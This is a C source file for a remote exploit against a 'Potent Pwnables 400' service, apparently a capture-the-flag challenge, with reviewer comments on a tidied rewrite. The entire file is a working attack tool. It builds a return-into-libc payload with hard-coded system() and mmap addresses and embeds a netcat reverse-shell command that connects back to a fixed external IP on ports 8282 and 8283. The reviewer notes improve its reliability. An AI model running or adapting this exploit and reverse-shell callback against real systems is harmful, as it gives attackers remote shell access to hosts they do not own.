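/*
** 0x82-sux_pwnage400.c - Potent Pwnables 400 remote exploit by x82
**
** pwnage400 exploit:
** --
** [x82@x0x x82]$ nc -l -p 8282
** whoami
**
** [x82@x0x x82]$ nc -l -p 8283
** pwnage400
** --
**
** Reviewer notes:
**  - The payload is a return-into-libc chain for a 32-bit x86 Linux target
**    without ASLR: the system() address and the command-string pointer below
**    are hard-coded and will need re-basing for any other build of the target.
**  - Every 32-bit field is emitted explicitly little-endian through put32(),
**    with a bounds check, instead of via `*(long *)&buf[i] = v` stores: on an
**    LP64 host those write 8 bytes and silently corrupt the layout, and the
**    casts are a strict-aliasing violation.
**  - The reverse-shell callback address is a compile-time constant
**    (CALLBACK_HOST); the usage string and exit codes are unchanged.
*/
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Host the target connects back to: stdin via port 8282, stdout via 8283. */
#define CALLBACK_HOST "221.154.133.40"

/*
 * Target-specific constants, carried over from the original exploit.
 * NOTE(review): 0xbfbdf000 presumably is where the service maps the
 * 0x1000-byte type-7 record (hence "call mmap()"); the command string is
 * written 4 bytes into that region, so the chain passes MMAP_ADDR + 4 to
 * system(). Neither value is verified here -- confirm against the target.
 */
#define SYSTEM_ADDR 0x28095b08u         /* system() in the target's libc   */
#define MMAP_ADDR   0xbfbdf000u         /* type-7 record mapping            */
#define CMD_ADDR    (MMAP_ADDR + 4u)    /* "nc ... | /bin/sh | nc ..." ptr  */
#define DUMMY_WORD  0x82828282u         /* filler / fake return address     */

enum {
    PAYLOAD_MAX   = 8192,   /* size of the on-stack payload buffer            */
    FRAME_RECORDS = 95,     /* leading records: type 3, size 0, count 1       */
    MMAP_SIZE     = 0x1000, /* size field of the type-7 record                */
    CHAIN_REPEATS = 342     /* (system, dummy, CMD_ADDR) triplets appended    */
};

/*
 * Append v to buf[off..] as four little-endian bytes.
 * Returns the new offset; terminates the program if the buffer would overflow.
 */
static size_t put32(unsigned char *buf, size_t off, size_t cap, uint32_t v)
{
    if (off > cap || cap - off < 4) {
        fprintf(stderr, "payload buffer overflow\n");
        exit(-1);
    }
    buf[off]     = (unsigned char)(v & 0xffu);
    buf[off + 1] = (unsigned char)((v >> 8) & 0xffu);
    buf[off + 2] = (unsigned char)((v >> 16) & 0xffu);
    buf[off + 3] = (unsigned char)((v >> 24) & 0xffu);
    return off + 4;
}

/*
 * Append n raw bytes from src to buf[off..].
 * Returns the new offset; terminates the program if the buffer would overflow.
 */
static size_t put_bytes(unsigned char *buf, size_t off, size_t cap,
                        const void *src, size_t n)
{
    if (off > cap || cap - off < n) {
        fprintf(stderr, "payload buffer overflow\n");
        exit(-1);
    }
    memcpy(buf + off, src, n);
    return off + n;
}

/*
 * Build the complete request into buf (capacity cap) and return its length.
 * Layout, in order:
 *   FRAME_RECORDS x { type=3, size=0, count=1 }
 *   { type=7, size=MMAP_SIZE }
 *   DUMMY_WORD, then the NUL-terminated shell command
 *   CHAIN_REPEATS x { SYSTEM_ADDR, DUMMY_WORD, CMD_ADDR }
 * The progress messages match the original tool's output.
 */
static size_t build_payload(unsigned char *buf, size_t cap)
{
    /* Reverse shell: stdin from port 8282, stdout to port 8283, then padding. */
    static const char ex_cmd[] =
        "nc " CALLBACK_HOST " 8282"   /* input  */
        "|/bin/sh|"
        "nc " CALLBACK_HOST " 8283;"  /* output */
        "x82x82x82";                  /* pad    */
    size_t off = 0;
    int i;

    memset(buf, 0, cap);

    printf(" [1] make stack frame\n");
    for (i = 0; i < FRAME_RECORDS; i++) {
        off = put32(buf, off, cap, 0x00000003u); /* type: 3  */
        off = put32(buf, off, cap, 0x00000000u); /* size: 0  */
        off = put32(buf, off, cap, 0x00000001u); /* count: 1 */
    }

    printf(" [2] location: 0x%08lx, call mmap();\n", (unsigned long)MMAP_ADDR);
    off = put32(buf, off, cap, 0x00000007u);     /* type: 7 */

    printf(" [3] input size: %d\n", MMAP_SIZE);
    off = put32(buf, off, cap, (uint32_t)MMAP_SIZE); /* size: 4096 */

    /* MMAP_ADDR + 0: dummy word; MMAP_ADDR + 4: the command string. */
    off = put32(buf, off, cap, DUMMY_WORD);

    printf(" [4] make reverse connect command\n");
    off = put_bytes(buf, off, cap, ex_cmd, sizeof ex_cmd); /* includes NUL */

    printf(" [5] make return-into-libc code\n");
    for (i = 0; i < CHAIN_REPEATS; i++) {
        off = put32(buf, off, cap, SYSTEM_ADDR); /* system() addr */
        off = put32(buf, off, cap, DUMMY_WORD);  /* fake return   */
        off = put32(buf, off, cap, CMD_ADDR);    /* cmd ptr       */
    }
    return off;
}

/*
 * Open a TCP connection to host:port (IPv4 only, as the original).
 * Returns a connected socket, or -1 on any failure (nothing is leaked).
 */
static int connect_to(const char *host, const char *port_str)
{
    struct sockaddr_in saddr;
    struct hostent *se;
    char *end = NULL;
    long port;
    int sock;

    port = strtol(port_str, &end, 10);
    if (end == port_str || *end != '\0' || port < 1 || port > 65535) {
        fprintf(stderr, "bad port: %s\n", port_str);
        return -1;
    }

    se = gethostbyname(host);
    if (se == NULL || se->h_addrtype != AF_INET ||
        se->h_length != (int)sizeof(struct in_addr) ||
        se->h_addr_list == NULL || se->h_addr_list[0] == NULL) {
        fprintf(stderr, "cannot resolve %s\n", host);
        return -1;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket");
        return -1;
    }

    memset(&saddr, 0, sizeof saddr);
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons((uint16_t)port);
    memcpy(&saddr.sin_addr, se->h_addr_list[0], sizeof(struct in_addr));

    if (connect(sock, (struct sockaddr *)&saddr, sizeof saddr) == -1) {
        perror("connect");
        close(sock); /* the original leaked the descriptor here */
        return -1;
    }
    return sock;
}

/* Write all len bytes to fd, retrying on short writes. Returns 0 or -1. */
static int send_all(int fd, const unsigned char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, buf, len);
        if (n < 0) {
            return -1;
        }
        buf += (size_t)n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Usage: pwnage400 [host] [port]
 * Connects to the target, sends the payload, waits one second and exits.
 * Exit status: 0 on success, -1 (255) on usage, resolution, connect or
 * write failure -- unchanged from the original.
 */
int main(int argc, char *argv[])
{
    unsigned char do_ex[PAYLOAD_MAX];
    size_t len;
    int sock;

    printf("\nPotent Pwnables 400 remote exploit by x82\n\n");
    if (argc < 3) {
        printf("Usage: %s [host] [port]\n", argv[0]);
        exit(-1);
    }

    /* Build first so a malformed payload never leaves a half-open session. */
    len = build_payload(do_ex, sizeof do_ex);

    sock = connect_to(argv[1], argv[2]);
    if (sock == -1) {
        return -1;
    }

    printf(" [6] send exploit.\n");
    if (send_all(sock, do_ex, len) != 0) {
        perror("write");
        close(sock);
        return -1;
    }

    printf(" [*] 1sec wait plz\n\n");
    sleep(1);
    close(sock);
    return 0;
}
/* eoc */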